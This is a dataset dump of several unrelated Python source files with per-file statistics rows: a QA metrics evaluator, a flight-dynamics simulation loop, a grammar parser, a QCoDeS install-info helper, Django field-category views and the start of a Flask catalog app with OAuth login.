output_prediction_file: File to store predictions to.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples}
gt_types = {ex.qas_id: ex.inference_chain for ex in dataset.examples}
# Compute basic metrics.
num_correct = {2: 0., 5: 0., 10: 0., 20: 0.}
aps = []
no_answer = 0.
all_predictions = {}
bridge_acc, comp_acc = 0., 0.
bridge_tot, comp_tot = 0, 0
single_acc = 0.
layer_weights = np.zeros_like(results[0]["layer_probs"])
num_layer_entities = {i: 0. for i in range(layer_weights.shape[0])}
num_new_entities = {i: 0. for i in range(layer_weights.shape[0])}
for result in results:
qas_id = result["qas_ids"].decode("utf-8")
preds = result["top_idx"]
scores = result["top_vals"]
ans = gt_answer[qas_id]
my_type = gt_types[qas_id]
if my_type == "bridge":
bridge_tot += 1
else:
comp_tot += 1
ranks = np.where(np.in1d(preds, ans))[0]
ranks = np.sort(ranks)
ap = 0.
cnt = 0.
if any(rr < 10 for rr in ranks):
single_acc += 1
if ranks.shape[0] == 0:
no_answer += 1
for rr in ranks:
cnt += 1
ap += cnt / (rr + 1)
if ans:
aps.append(ap / len(ans))
else:
aps.append(0.)
found = False
for key in [2, 5, 10, 20]:
if found or np.in1d(ans, preds[:key]).all():
num_correct[key] += 1
found = True
if key == 10:
if my_type == "bridge":
bridge_acc += 1
else:
comp_acc += 1
# Non-accuracy stats
layer_weights += result["layer_probs"]
layer_entities = {i: set() for i in range(layer_weights.shape[0])}
all_predictions[qas_id] = {}
for i in range(layer_weights.shape[0]):
layer_entities[i] = set(
[ee for ee in result["layer_%d_ent" % i] if ee != -1])
num_layer_entities[i] += len(layer_entities[i])
num_new_entities[i] += len(layer_entities[i] - layer_entities[0])
# all_predictions[qas_id]["layer_%d" % i] = [
# name_map[str(ee)] for ee in layer_entities[i]]
all_predictions[qas_id]["predictions"] = [
(name_map[str(pred)], str(scores[i])) for i, pred in enumerate(preds)
]
tf.logging.info("Evaluated %d items", len(all_predictions))
accuracy = {
key: (num_correct[key] / len(all_predictions)) for key in num_correct
}
# Compute advanced metrics.
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
# Return metrics.
metrics = {"eval/@%d" % key: accuracy[key] for key in accuracy}
metrics["accuracy"] = accuracy[10]
metrics["eval/map"] = sum(aps) / len(all_predictions)
metrics["eval/bridge_accuracy"] = bridge_acc / bridge_tot
metrics["eval/comparison_accuracy"] = comp_acc / comp_tot
metrics["analysis/single_accuracy"] = single_acc / len(all_predictions)
metrics["analysis/no_answers"] = no_answer / len(all_predictions)
for i in range(layer_weights.shape[0]):
metrics["analysis/layer_weight_%d" %
i] = layer_weights[i] / len(all_predictions)
metrics["analysis/num_entities_%d" %
i] = num_layer_entities[i] / len(all_predictions)
metrics["analysis/num_new_entities_%d" %
i] = num_new_entities[i] / len(all_predictions)
return metrics
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r"\b(a|an|the)\b", " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def f1_score(prediction, ground_truth):
"""Compute F1 score."""
prediction_tokens = normalize_answer(prediction).split()
ground_truth_tokens = normalize_answer(ground_truth).split()
common = collections.Counter(prediction_tokens) & collections.Counter(
ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def exact_match_score(prediction, ground_truth):
"""Compute EM score."""
return normalize_answer(prediction) == normalize_answer(ground_truth)
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
scores_for_ground_truths = []
for ground_truth in ground_truths:
my_score = metric_fn(prediction, ground_truth)
scores_for_ground_truths.append(my_score)
return max(scores_for_ground_truths)
def read_predictions(prediction_file):
with tf.gfile.Open(prediction_file) as f:
predictions = json.load(f)
return predictions
def read_answers(gold_file):
"""Read ground truth answers."""
answers = {}
f = tf.gfile.Open(gold_file)
if gold_file.endswith(".gz"):
f = gzip.GzipFile(fileobj=f)
for i, line in enumerate(f):
example = json.loads(line)
if i == 0 and "header" in example:
continue
for qa in example["qas"]:
answers[qa["qid"]] = qa["answers"]
f.close()
return answers
def evaluate(answers, predictions, skip_no_answer=False):
"""Compute F1 and EM scores."""
f1 = exact_match = total = 0
for qid, ground_truths in answers.items():
if qid not in predictions:
if not skip_no_answer:
message = "Unanswered question %s will receive score 0." % qid
print(message)
total += 1
continue
total += 1
prediction = predictions[qid]
exact_match += metric_max_over_ground_truths(exact_match_score, prediction,
ground_truths)
f1 += metric_max_over_ground_truths(f1_score, prediction, ground_truths)
exact_match = 100.0 * exact_match / total
f1 = 100.0 * f1 / total
return {"exact_match": exact_match, "f1": f1}
def mrqa_eval_fn(dataset_file, predictions_file, skip_no_answer=True):
answers = read_answers(dataset_file)
predictions = read_predictions(predictions_file)
return evaluate(answers, predictions, skip_no_answer)
def compute_scores(ground_truth_file, predicted_answers_file):
"""Read predictions and ground truth and return P, R, F."""
telemetry, incorrect = read_results(ground_truth_file, predicted_answers_file)
micro = aprf(telemetry)
relationwise = aprf_relationwise(telemetry)
macro = sum([val[0] for _, val in relationwise.items()])
macro = macro / len(relationwise)
return micro, macro, relationwise, incorrect
def read_results(ground_truth_file, predicted_answers_file):
"""Read results and ground truth and return data structure with stats."""
with codecs.getreader("utf-8")(tf.gfile.GFile(ground_truth_file,
"r")) as read:
data_ = {}
for line in read:
item = json.loads(line.strip())
if isinstance(item["relation"], dict):
relation = item["relation"]["wikidata_id"]
elif isinstance(item["relation"], list):
relation = (
item["relation"][0]["wikidata_id"] + "_" +
item["relation"][1]["wikidata_id"])
data_[item["id"]] = [relation, item["subject"]["wikidata_id"]]
if "is_impossible" in item and item["is_impossible"]:
continue
if item["object"] is None:
continue
if isinstance(item["object"]["mention"], dict):
data_[item["id"]] += [item["object"]["mention"]["text"]]
if "name" in item["object"]:
data_[item["id"]] += [item["object"]["name"]]
if "aliases" in item["object"]:
data_[item["id"]] += item["object"]["aliases"].keys()
with codecs.getreader("utf-8")(tf.gfile.GFile(predicted_answers_file,
"r")) as fin:
predictions = json.load(fin)
telemetry, incorrect = [], []
n = 0
for key in data_:
if key not in predictions:
continue
g = data_[key][2:]
a = predictions[key]
m = data_[key][:2]
stats = score(g, a)
telemetry.append([m[0], m[1], g, a, stats])
if stats[0] == 0. and stats[3] > 0.:
incorrect.append(key)
n += 1
return telemetry, incorrect
def aprf_relationwise(g):
"""Returns precision, recall and F score for each relation."""
rel_to_stats = collections.defaultdict(list)
for item in g:
rel_to_stats[item[0]].append(item)
rel_to_scores = {}
for rel, stats in rel_to_stats.items():
rel_to_scores[rel] = [aprf(stats), len(stats)]
return rel_to_scores
def aprf(g):
"""Returns precision, recall and F of the given statistics."""
tp, _, sys_pos, real_pos = sum([x[-1] for x in g])
if tp == 0:
p = r = f = 0.0
else:
p = tp / float(sys_pos) if sys_pos > 0 else 0.
r = tp / float(real_pos) if real_pos > 0 else 0.
f = 2 * p * r / (p + r)
return np.asarray([p, r, f])
def score(gold, answer):
"""Compares answer to ground truth to return TP / FP stats."""
if gold:
gold = set([simplify(g) for g in gold])
answer = simplify(answer)
result = np.zeros(4)
if gold:
result[3] += 1
if answer in gold:
result[0] += 1
else:
if not answer:
result[1] += 1
if answer:
result[2] += 1
return result
def strip_accents_and_punct(text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
if char in PUNCTUATION:
continue
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def simplify(answer):
"""Pre-process answer string."""
toks = []
articles = {"the", "a", "an", "and", ""}
for t in answer.strip().lower().split():
tok = strip_accents_and_punct(t)
if tok not in articles:
toks.append(tok)
return "".join(toks)
def rare_relation_scores(relationwise, relation2counts):
"""Print statistics of rare relations for different thresholds."""
for thresh in [5, 100, 500, 1000]:
freq_stats, freq_total = np.array([0., 0., 0.]), 0
rare_stats, rare_total = np.array([0., 0., 0.]), 0
for relation, (stats, _) in relationwise.items():
if relation2counts.get(relation, 0) < thresh:
rare_stats += stats
rare_total += 1
else:
freq_stats += stats
freq_total += 1
rare_stats /= rare_total
freq_stats /= freq_total
print(
"Threshold =", thresh, "rare", rare_total,
"Micro-P %.3f Micro-R %.3f Micro-F %.3f" %
(rare_stats[0], rare_stats[1], rare_stats[2]), "freq", freq_total,
"Micro-P %.3f Micro-R %.3f Micro-F %.3f" %
(freq_stats[0], freq_stats[1], freq_stats[2]))
def main(_):
eval_type = "hotpot"
if eval_type == "hotpot":
test_hotpot_eval()
else:
micro, macro, rwise, _ = compute_scores(FLAGS.ground_truth_file,
FLAGS.predicted_answers_file)
print("Micro", micro)
print("Macro", macro)
if FLAGS.relation_counts_file is not None:
r2c = json.load(tf.gfile.Open(FLAGS.relation_counts_file))
rare_relation_scores(rwise, r2c)
if __name__ == "__main__":
app.run(main)
| 33.196891
| 80
| 0.643827
| 2,617
| 19,221
| 4.542224
| 0.155522
| 0.011441
| 0.01346
| 0.006057
| 0.38336
| 0.332885
| 0.309414
| 0.29057
| 0.2549
| 0.248002
| 0
| 0.015265
| 0.229749
| 19,221
| 578
| 81
| 33.254325
| 0.787639
| 0.150773
| 0
| 0.241706
| 0
| 0
| 0.09943
| 0.010346
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059242
| false
| 0
| 0.033175
| 0.007109
| 0.158768
| 0.009479
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139b6ad51a7b83cb108f4b1bb43a2ce22b27cc6e
| 2,377
|
py
|
Python
|
AirplaneLQR/chap4LQR/mavsim_chap4.py
|
eyler94/ee674AirplaneSim
|
3ba2c6e685c2688a7f372475a7cd1f55f583d10e
|
[
"MIT"
] | 1
|
2020-06-07T00:14:42.000Z
|
2020-06-07T00:14:42.000Z
|
AirplaneLQR/chap4LQR/mavsim_chap4.py
|
eyler94/ee674AirplaneSim
|
3ba2c6e685c2688a7f372475a7cd1f55f583d10e
|
[
"MIT"
] | null | null | null |
AirplaneLQR/chap4LQR/mavsim_chap4.py
|
eyler94/ee674AirplaneSim
|
3ba2c6e685c2688a7f372475a7cd1f55f583d10e
|
[
"MIT"
] | 1
|
2019-06-24T22:10:48.000Z
|
2019-06-24T22:10:48.000Z
|
"""
mavsimPy
- Chapter 4 assignment for Beard & McLain, PUP, 2012
- Update history:
12/27/2018 - RWB
1/17/2019 - RWB
"""
import sys
sys.path.append('..')
import numpy as np
import parameters.simulation_parameters as SIM
from chap2.mav_viewer import mav_viewer
# from chap2.video_writer import video_writer
from chap3.data_viewer import data_viewer
from chap4.mav_dynamics import mav_dynamics
from chap4.wind_simulation import wind_simulation
from time import sleep
# initialize the visualization
VIDEO = False # True==write video, False==don't write video
mav_view = mav_viewer() # initialize the mav viewer
data_view = data_viewer() # initialize view of data plots
if VIDEO == True:
video = video_writer(video_name="chap4_video.avi",
bounding_box=(0, 0, 1000, 1000),
output_rate=SIM.ts_video)
# initialize elements of the architecture
wind = wind_simulation(SIM.ts_simulation)
mav = mav_dynamics(SIM.ts_simulation)
# initialize the simulation time
sim_time = SIM.start_time
# main simulation loop
# sleep(5)
print("Press Command-Q to exit...")
while sim_time < SIM.end_time:
#-------set control surfaces-------------
if(sim_time<25):
delta_e = -0.1
delta_t = 1.0 # 0.5
delta_a = 0.0 # 0.0
delta_r = 0.0 # 0.005
delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector
else:
delta_e = -0.3
delta_t = 1.0#0.5
delta_a = 0.01#0.0
delta_r = 0.00025#0.005
delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector
#-------physical system-------------
current_wind = wind.update() # get the new wind vector
# print("current wind: ", current_wind)
mav.update_state(delta, current_wind) # propagate the MAV dynamics
#-------update viewer-------------
mav_view.update(mav.msg_true_state) # plot body of MAV
data_view.update(mav.msg_true_state, # true states
mav.msg_true_state, # estimated states
mav.msg_true_state, # commanded states
SIM.ts_simulation)
if VIDEO == True:
video.update(sim_time)
#-------increment time-------------
sim_time += SIM.ts_simulation
if VIDEO == True:
video.close()
| 30.87013
| 106
| 0.63862
| 340
| 2,377
| 4.276471
| 0.323529
| 0.01238
| 0.041265
| 0.041265
| 0.23934
| 0.198074
| 0.163686
| 0.121045
| 0.121045
| 0.097662
| 0
| 0.041989
| 0.238536
| 2,377
| 76
| 107
| 31.276316
| 0.761326
| 0.339083
| 0
| 0.2
| 0
| 0
| 0.028068
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.177778
| 0
| 0.177778
| 0.022222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139ccafc558ec94667dba3f86f2f3f760f5cf3e5
| 11,176
|
py
|
Python
|
nelly/parser.py
|
shawcx/nelly
|
8075b92e20064a117f9ab5a6d8ad261d21234111
|
[
"MIT"
] | null | null | null |
nelly/parser.py
|
shawcx/nelly
|
8075b92e20064a117f9ab5a6d8ad261d21234111
|
[
"MIT"
] | null | null | null |
nelly/parser.py
|
shawcx/nelly
|
8075b92e20064a117f9ab5a6d8ad261d21234111
|
[
"MIT"
] | null | null | null |
#
# (c) 2008-2020 Matthew Shaw
#
import sys
import os
import re
import logging
import nelly
from .scanner import Scanner
from .program import Program
from .types import *
class Parser(object):
def __init__(self, include_dirs=[]):
self.include_dirs = include_dirs + [ os.path.join(nelly.root, 'grammars') ]
self.pwd = []
# setup the scanner based on the regular expressions
self.scanner = Scanner(os.path.join(nelly.root, 'rules.lex'))
# container for the compiled program
self.program = Program()
self.tokens_stack = []
self.groups_stack = []
self.group_stack = []
self.groups = None
self.group = None
def Parse(self, grammarFile):
grammar = grammarFile.read()
self.pwd.append(os.path.dirname(grammarFile.name))
logging.debug('Parsing %s (%d bytes)', grammarFile.name, len(grammar))
self.tokens = self.scanner.Scan(grammar)
# keep a reference to the tokens for when included files are parsed
self.tokens_stack.append(self.tokens)
# iterate over all the tokens
while self.tokens:
(token,value,line,col) = self.tokens.Next()
# handle all the top-level tokens
if 'nonterminal' == token:
if value.startswith('::'):
value = value[2:]
self._nonterminal(Types.NONTERMINAL, value)
elif 'varterminal' == token:
if value.startswith('::'):
value = value[2:]
self._nonterminal(Types.VARTERMINAL, value)
elif 'include' == token:
self._include()
elif 'start_python_code' == token:
if r'<%pre' == value:
self.program.preamble.append(self._python_code('pre'))
elif r'<%post' == value:
self.program.postscript.append(self._python_code('post'))
else:
raise nelly.error('Please specify pre or post in code section')
elif 'start_comment' == token:
self._comment()
else:
raise nelly.error('Unhandled %s %s at %d:%d', token, repr(value), line, col)
self.tokens_stack.pop()
return self.program
def _nonterminal(self, _type, name):
# create a new container and add it to the program
nonterminal = Nonterminal(_type, name)
self.program.nonterminals[name] = nonterminal
(token,value,line,col) = self.tokens.Next()
# parse any optional arguments for the non-terminal
if 'lparen' == token:
while True:
(token,value,line,col) = self.tokens.Next()
if 'rparen' == token:
break
elif 'comma' == token:
continue
elif 'option' == token:
nonterminal.options.append(value)
if value == 'start':
self.program.start.append(name)
elif 'decorator' == token:
nonterminal.decorators.append(value[1:])
else:
raise nelly.error('Unknown option: %s %s', token, value)
(token,value,line,col) = self.tokens.Next()
if 'colon' != token:
raise nelly.error('Parse error, missing colon at line %d, column %d', line, col)
# parse zero or more expressions until a semicolon is found
self._expressions('pipe', 'semicolon', nonterminal)
def _expressions(self, delimiter, sentinel, nonterminal):
(token,value,line,col) = self.tokens.Peek()
expression = Expression((line,col))
while self.tokens:
(token,value,line,col) = self.tokens.Next()
if sentinel == token:
nonterminal.expressions.append(expression)
break
elif delimiter == token:
nonterminal.expressions.append(expression)
expression = Expression((line,col))
elif 'lparen' == token:
anonterminal = Nonterminal(Types.ANONYMOUS)
expression.Statement(Types.ANONYMOUS, anonterminal)
self._expressions('pipe', 'rparen', anonterminal)
elif token in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
quote = self._quote()
expression.Statement(Types.TERMINAL, quote)
elif token in ['start_single_bytes', 'start_double_bytes', 'start_triple_bytes']:
byte_quote = self._quote()
expression.Statement(Types.TERMINAL, byte_quote)
elif 'nonterminal' == token:
expression.Statement(Types.NONTERMINAL, value)
elif 'varterminal' == token:
expression.Statement(Types.VARTERMINAL, value)
elif 'backref' == token:
expression.Statement(Types.BACKREFERENCE, value)
elif 'function' == token:
functerminal = Nonterminal(Types.ANONYMOUS)
self._expressions('comma', 'rparen', functerminal)
expression.Statement(Types.FUNCTION, value[1:], functerminal)
elif 'reference' == token:
expression.Statement(Types.REFERENCE, value[1:])
elif 'constant' == token:
expression.Statement(Types.TERMINAL, value)
elif 'start_python_code' == token:
expression.code = self._python_code(nonterminal.name)
elif 'lbracket' == token:
try:
expression.Operation(Types.SLICE, self._slice())
except IndexError:
raise nelly.error('Applying slice to nothing at line %d, column %d', line, col)
elif 'lcurley' == token:
try:
expression.Operation(Types.RANGE, self._range())
except IndexError:
raise nelly.error('Applying range to nothing at line %d, column %d', line, col)
elif 'langle' == token:
expression.Weight(self._weight())
elif 'empty' == token:
pass
else:
raise nelly.error('Unhandled token "%s" at line %d, column %d', token, line, col)
def _quote(self):
# this will always be the quoted value
(token,value,line,col) = self.tokens.Next()
# this will always be the terminal quote
self.tokens.Next()
return value
#
# Slice a string
#
def _slice(self):
front = None
back = None
start = False
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
front = value
start = True
(token,value,line,col) = self.tokens.Next()
if 'rbracket' == token:
if False == start:
raise nelly.error('Empty slice at line %d, column %d', line, col)
return (front,front+1)
elif 'colon' != token:
raise nelly.error('Missing colon at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
back = value
(token,value,line,col) = self.tokens.Next()
elif 'rbracket' != token:
raise nelly.error('Missing ] at line %d, column %d', line, col)
return (front,back)
#
# Repeat a range
#
def _range(self):
lower = 0
upper = 0
(token,value,line,col) = self.tokens.Next()
if 'constant' != token:
raise nelly.error('Missing range at line %d, column %d', line, col)
lower = value
upper = value
(token,value,line,col) = self.tokens.Next()
if 'rcurley' == token:
return (lower,upper)
elif 'comma' != token:
raise nelly.error('Missing comma at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
upper = value
else:
raise nelly.error('Missing range at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'rcurley' != token:
raise nelly.error('Missing } at line %d, column %d', line, col)
if lower > upper:
lower,upper = upper,lower
return (lower,upper)
def _weight(self):
(token,value,line,col) = self.tokens.Next()
if 'constant' != token:
raise nelly.error('Missing weight at line %d, column %d', line, col)
(token,ignore,line,col) = self.tokens.Next()
if 'rangle' != token:
raise nelly.error('Missing > at %d, column %d', line, col)
return value
#
# Compile the Python into a code object
#
def _python_code(self, name):
(token,value,line,col) = self.tokens.Next()
values = [s for s in value.split('\n') if s.strip()] or ['']
# save the whitepsace of the first line
ws = re.compile(r'\s*').match(values[0]).group()
# check indentation
if [s for s in values if not s.startswith(ws)]:
raise nelly.error('Bad indentation in code block at line %d, column %d', line, col)
# strip and rejoin the code
codeblock = '\n'.join(s[len(ws):] for s in values)
# eat the end_python_code token
self.tokens.Next()
try:
return compile(codeblock, '<'+name+'>', 'exec')
except SyntaxError as e:
raise nelly.error('%d: %s: %s', e.lineno, e.msg, repr(e.text))
#
# Include other BNF files
#
def _include(self):
(token,value,line,col) = self.tokens.Next()
# file names are quoted
if token not in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
raise nelly.error('quoted file path expected')
# get the quoted value
path = self._quote()
# try opening the file in each include directory, ignore errors
content = None
for include_dir in self.pwd[-1:] + self.include_dirs:
try:
fullpath = os.path.join(include_dir, path)
content = open(fullpath, 'r')
logging.debug('Including file %s', repr(fullpath))
break
except:
continue
# if no file was found, throw an error
if None == content:
raise nelly.error('Could not load file %s', repr(path))
# ignore empty file
if not content:
return
# compile it inline
self.Parse(content)
self.pwd.pop()
# restore the current tokens
self.tokens = self.tokens_stack[-1]
#
# Multi-line comments
#
def _comment(self):
# consume and disregard the tokens
while True:
(token,value,line,col) = self.tokens.Next()
if 'start_comment' == token:
self._comment()
if 'end_comment' == token:
return
| 34.708075
| 99
| 0.54796
| 1,237
| 11,176
| 4.88844
| 0.19806
| 0.042831
| 0.038201
| 0.059038
| 0.382008
| 0.295188
| 0.25831
| 0.221267
| 0.19828
| 0.177939
| 0
| 0.002576
| 0.340104
| 11,176
| 321
| 100
| 34.816199
| 0.817356
| 0.083482
| 0
| 0.308036
| 0
| 0
| 0.125172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049107
| false
| 0.004464
| 0.035714
| 0
| 0.133929
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139d2344b35cd1e7a61819201ca64cbfee2afef8
| 2,363
|
py
|
Python
|
qcodes/utils/installation_info.py
|
zhinst/Qcodes
|
d95798bd08d57bb8cddd460fdb4a5ff25f19215c
|
[
"MIT"
] | 1
|
2020-10-19T08:09:04.000Z
|
2020-10-19T08:09:04.000Z
|
qcodes/utils/installation_info.py
|
M1racleShih/Qcodes
|
c03029a6968e16379155aadc8b083a02e01876a6
|
[
"MIT"
] | 230
|
2020-08-17T06:08:33.000Z
|
2022-03-29T12:06:58.000Z
|
qcodes/utils/installation_info.py
|
nikhartman/Qcodes
|
042c5e25ab9e40b20c316b4055c4842844834d1e
|
[
"MIT"
] | 4
|
2017-12-11T12:13:41.000Z
|
2018-08-01T13:13:04.000Z
|
"""
This module contains helper functions that provide information about how
QCoDeS is installed and about what other packages are installed along with
QCoDeS
"""
import sys
from typing import Dict, List, Optional
import subprocess
import json
import logging
import requirements
if sys.version_info >= (3, 8):
from importlib.metadata import distribution, version, PackageNotFoundError
else:
# 3.7 and earlier
from importlib_metadata import distribution, version, PackageNotFoundError
import qcodes
log = logging.getLogger(__name__)
def is_qcodes_installed_editably() -> Optional[bool]:
"""
Try to ask pip whether QCoDeS is installed in editable mode and return
the answer a boolean. Returns None if pip somehow did not respond as
expected.
"""
answer: Optional[bool]
try:
pipproc = subprocess.run(['python', '-m', 'pip', 'list', '-e', '--no-index',
'--format=json'],
check=True,
stdout=subprocess.PIPE)
e_pkgs = json.loads(pipproc.stdout.decode('utf-8'))
answer = any([d["name"] == 'qcodes' for d in e_pkgs])
except Exception as e: # we actually do want a catch-all here
log.warning(f'{type(e)}: {str(e)}')
answer = None
return answer
def get_qcodes_version() -> str:
"""
Get the version of the currently installed QCoDeS
"""
return qcodes.version.__version__
def get_qcodes_requirements() -> List[str]:
"""
Return a list of the names of the packages that QCoDeS requires
"""
qc_pkg = distribution('qcodes').requires
if qc_pkg is None:
return []
package_names = [list(requirements.parse(req))[0].name for req in qc_pkg]
return package_names
def get_qcodes_requirements_versions() -> Dict[str, str]:
"""
Return a dictionary of the currently installed versions of the packages
that QCoDeS requires. The dict maps package name to version string.
If an (optional) dependency is not installed the name maps to "Not installed".
"""
req_names = get_qcodes_requirements()
req_versions = {}
for req in req_names:
try:
req_versions[req] = version(req)
except PackageNotFoundError:
req_versions[req] = "Not installed"
return req_versions
| 28.130952
| 84
| 0.656792
| 300
| 2,363
| 5.056667
| 0.396667
| 0.01648
| 0.023731
| 0.035597
| 0.127884
| 0.127884
| 0.087014
| 0
| 0
| 0
| 0
| 0.003399
| 0.253068
| 2,363
| 83
| 85
| 28.46988
| 0.856091
| 0.292425
| 0
| 0.047619
| 0
| 0
| 0.058601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.214286
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139d2693f9221f951071ee2118de0f027b954129
| 1,177
|
py
|
Python
|
documents/views.py
|
brandonrobertz/foia-pdf-processing-system
|
025516b5e2234df16741237c4208cd484f577370
|
[
"MIT"
] | null | null | null |
documents/views.py
|
brandonrobertz/foia-pdf-processing-system
|
025516b5e2234df16741237c4208cd484f577370
|
[
"MIT"
] | null | null | null |
documents/views.py
|
brandonrobertz/foia-pdf-processing-system
|
025516b5e2234df16741237c4208cd484f577370
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import JsonResponse
from .models import FieldCategory
def fieldname_values(request):
if request.method == "GET":
fieldname = request.GET['fieldname']
query = request.GET.get('q')
q_kwargs= dict(
fieldname=fieldname,
)
if query:
q_kwargs['value__icontains'] = query
fc = FieldCategory.objects.filter(
**q_kwargs
).order_by("-count").values('value')
return JsonResponse(list(fc), safe=False)
elif request.method == "POST":
fieldname = request.POST['fieldname']
value = request.POST['value']
fc, created = FieldCategory.objects.get_or_create(
fieldname=fieldname,
value=value
)
return JsonResponse({'status': 'ok'})
def fieldname_value_count(request):
# just let it explode if people don't POST properly
fieldname = request.POST['fieldname']
value = request.POST['value']
fc = FieldCategory.objects.get(
fieldname=fieldname,
value=value
)
fc.count += 1
fc.save()
return JsonResponse({'status': 'ok'})
| 28.02381
| 58
| 0.614274
| 127
| 1,177
| 5.606299
| 0.385827
| 0.098315
| 0.061798
| 0.081461
| 0.146067
| 0.146067
| 0.146067
| 0.146067
| 0.146067
| 0
| 0
| 0.001164
| 0.270178
| 1,177
| 41
| 59
| 28.707317
| 0.827707
| 0.041631
| 0
| 0.323529
| 0
| 0
| 0.078153
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.088235
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139ed09f5c5b42cbc50f76d8cc6ce28401b30b04
| 12,850
|
py
|
Python
|
application.py
|
nicholsont/catalog_app
|
011e4c35401aa1128a4cf1ca99dd808da7a759e6
|
[
"Unlicense"
] | null | null | null |
application.py
|
nicholsont/catalog_app
|
011e4c35401aa1128a4cf1ca99dd808da7a759e6
|
[
"Unlicense"
] | null | null | null |
application.py
|
nicholsont/catalog_app
|
011e4c35401aa1128a4cf1ca99dd808da7a759e6
|
[
"Unlicense"
] | null | null | null |
from flask import Flask, render_template, request, redirect, jsonify, g
from flask import url_for, flash, make_response
from flask import session as login_session
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from models import Base, Category, Item, User
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import httplib2
import json
import requests
app = Flask(__name__)
# Retrieves client ID's and secrets from the json files
CLIENT_ID = json.loads(open('client_secrets.json', 'r')
.read())['web']['client_id']
APP_ID = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_id']
APP_SECRET = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_secret']
# Connect to Database and create database session
engine = create_engine('sqlite:///catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Login handler
@app.route('/login')
def showLogin():
"""JSON API to view entire catalog Information."""
return render_template('login.html')
# Third Party Oauth callback
@app.route('/oauth/<provider>', methods=['POST'])
def oauthLogin(provider):
"""
Retrieves provider to process oauth login.
params:(string) oauth provider
"""
if provider == 'google':
code = request.data
try:
# Upgrade auth code into credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json',
scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = make_response(
json.dumps('Failed to upgrade the authorization code.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Check for valid access token
access_token = credentials.access_token
url = 'https://www.googleapis.com/oauth2/v1/tokeninfo?' \
'access_token={}'.format(access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Access token error handling
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = ' application/json'
return response
# Store access token in session
login_session['provider'] = 'google'
login_session['access_token'] = access_token
login_session['gplus_id'] = credentials.id_token['sub']
# Get user info
userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo'
params = {'access_token': login_session['access_token'], 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = json.loads(answer.text)
login_session['username'] = data['name']
login_session['picture'] = data['picture']
login_session['email'] = data['email']
